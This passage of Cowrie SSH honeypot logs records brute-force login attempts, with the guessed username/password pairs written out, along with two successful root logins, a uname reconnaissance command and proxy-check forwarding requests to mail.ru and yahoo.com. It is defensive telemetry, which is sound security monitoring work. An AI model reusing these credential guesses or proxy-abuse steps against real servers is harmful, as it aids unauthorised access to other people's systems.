1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:04:42.912391Z","src_ip":"212.227.125.160","session":"08937820efbb"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":46522,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d6abe679812","protocol":"ssh","message":"New connection: 41.226.27.251:46522 (1.2.3.4:22) [session: 2d6abe679812]","sensor":"my-vps","timestamp":"2025-08-31T03:04:44.182091Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:04:44.250535Z","src_ip":"41.226.27.251","session":"2d6abe679812"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:04:44.251137Z","src_ip":"41.226.27.251","session":"2d6abe679812"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp","message":"login attempt [uftp/uftp] failed","sensor":"my-vps","timestamp":"2025-08-31T03:04:44.428405Z","src_ip":"41.226.27.251","session":"2d6abe679812"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"root123","message":"login attempt [ftpuser/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:04:44.694923Z","src_ip":"212.227.125.160","session":"08937820efbb"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:04:45.711242Z","src_ip":"41.226.27.251","session":"2d6abe679812"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:04:46.211107Z","src_ip":"212.227.125.160","session":"08937820efbb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32930,"dst_ip":"1.2.3.4","dst_port":22,"session":"c195c8c3e516","protocol":"ssh","message":"New connection: 212.227.235.229:32930 (1.2.3.4:22) [session: c195c8c3e516]","sensor":"my-vps","timestamp":"2025-08-31T03:04:49.776617Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:04:49.777565Z","src_ip":"212.227.235.229","session":"c195c8c3e516"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:04:50.032184Z","src_ip":"212.227.235.229","session":"c195c8c3e516"}
{"eventid":"cowrie.login.success","username":"root","password":"aB123456","message":"login attempt [root/aB123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:04:50.799682Z","src_ip":"212.227.235.229","session":"c195c8c3e516"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:04:51.326121Z","src_ip":"212.227.235.229","session":"c195c8c3e516"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:04:51.326952Z","src_ip":"212.227.235.229","session":"c195c8c3e516"}
{"eventid":"cowrie.session.closed","duration":"35.6","message":"Connection lost after 35.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:04:51.328941Z","src_ip":"212.227.235.229","session":"479b4b3704e0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:04:51.583253Z","src_ip":"212.227.235.229","session":"c195c8c3e516"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:04:51.584484Z","src_ip":"212.227.235.229","session":"c195c8c3e516"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:04:52.352673Z","src_ip":"212.227.125.160","session":"f69620544d6e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:04:52.353488Z","src_ip":"212.227.125.160","session":"f69620544d6e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":54723,"dst_ip":"1.2.3.4","dst_port":22,"session":"c17a5930d0b6","protocol":"ssh","message":"New connection: 77.83.207.83:54723 (1.2.3.4:22) [session: c17a5930d0b6]","sensor":"my-vps","timestamp":"2025-08-31T03:04:54.775743Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:04:54.776400Z","src_ip":"77.83.207.83","session":"c17a5930d0b6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:04:54.826242Z","src_ip":"77.83.207.83","session":"c17a5930d0b6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:04:55.073473Z","src_ip":"77.83.207.83","session":"c17a5930d0b6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":8123,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:8123","sensor":"my-vps","timestamp":"2025-08-31T03:04:55.124075Z","session":"c17a5930d0b6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:04:55.173823Z","src_ip":"77.83.207.83","session":"c17a5930d0b6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":3356,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:3356","sensor":"my-vps","timestamp":"2025-08-31T03:04:55.315882Z","session":"c17a5930d0b6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:04:55.365511Z","src_ip":"77.83.207.83","session":"c17a5930d0b6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":16793,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:16793","sensor":"my-vps","timestamp":"2025-08-31T03:04:55.508146Z","session":"c17a5930d0b6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:04:55.558022Z","src_ip":"77.83.207.83","session":"c17a5930d0b6"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:04:55.608875Z","src_ip":"77.83.207.83","session":"c17a5930d0b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38284,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e7da730ac77","protocol":"ssh","message":"New connection: 212.227.235.229:38284 (1.2.3.4:22) [session: 0e7da730ac77]","sensor":"my-vps","timestamp":"2025-08-31T03:04:56.431895Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:04:56.432603Z","src_ip":"212.227.235.229","session":"0e7da730ac77"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T03:04:56.530647Z","src_ip":"212.227.235.229","session":"0e7da730ac77"}
{"eventid":"cowrie.login.failed","username":"loginuser","password":"1234567","message":"login attempt [loginuser/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T03:04:56.833804Z","src_ip":"212.227.235.229","session":"0e7da730ac77"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:04:57.933327Z","src_ip":"212.227.235.229","session":"0e7da730ac77"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":37876,"dst_ip":"1.2.3.4","dst_port":22,"session":"20adeb89ef72","protocol":"ssh","message":"New connection: 41.226.27.251:37876 (1.2.3.4:22) [session: 20adeb89ef72]","sensor":"my-vps","timestamp":"2025-08-31T03:05:04.225403Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:05:04.282127Z","src_ip":"41.226.27.251","session":"20adeb89ef72"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:05:04.283009Z","src_ip":"41.226.27.251","session":"20adeb89ef72"}
{"eventid":"cowrie.login.failed","username":"flink","password":"flink123","message":"login attempt [flink/flink123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:05:04.499198Z","src_ip":"41.226.27.251","session":"20adeb89ef72"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:05:05.807976Z","src_ip":"41.226.27.251","session":"20adeb89ef72"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40294,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a88bd365c24","protocol":"ssh","message":"New connection: 212.227.235.229:40294 (1.2.3.4:22) [session: 5a88bd365c24]","sensor":"my-vps","timestamp":"2025-08-31T03:05:17.253283Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51182,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4805d244549","protocol":"ssh","message":"New connection: 212.227.235.229:51182 (1.2.3.4:22) [session: e4805d244549]","sensor":"my-vps","timestamp":"2025-08-31T03:05:20.396423Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:05:21.176528Z","src_ip":"212.227.235.229","session":"e4805d244549"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:05:21.177209Z","src_ip":"212.227.235.229","session":"e4805d244549"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":41886,"dst_ip":"1.2.3.4","dst_port":22,"session":"19abb15c5c57","protocol":"ssh","message":"New connection: 41.226.27.251:41886 (1.2.3.4:22) [session: 19abb15c5c57]","sensor":"my-vps","timestamp":"2025-08-31T03:05:24.536440Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:05:24.537620Z","src_ip":"41.226.27.251","session":"19abb15c5c57"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:05:24.581686Z","src_ip":"41.226.27.251","session":"19abb15c5c57"}
{"eventid":"cowrie.login.failed","username":"gitlab-runner","password":"gitlab-runner","message":"login attempt [gitlab-runner/gitlab-runner] failed","sensor":"my-vps","timestamp":"2025-08-31T03:05:24.715091Z","src_ip":"41.226.27.251","session":"19abb15c5c57"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:05:25.942106Z","src_ip":"41.226.27.251","session":"19abb15c5c57"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:05:26.314994Z","src_ip":"212.227.235.229","session":"5a88bd365c24"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chac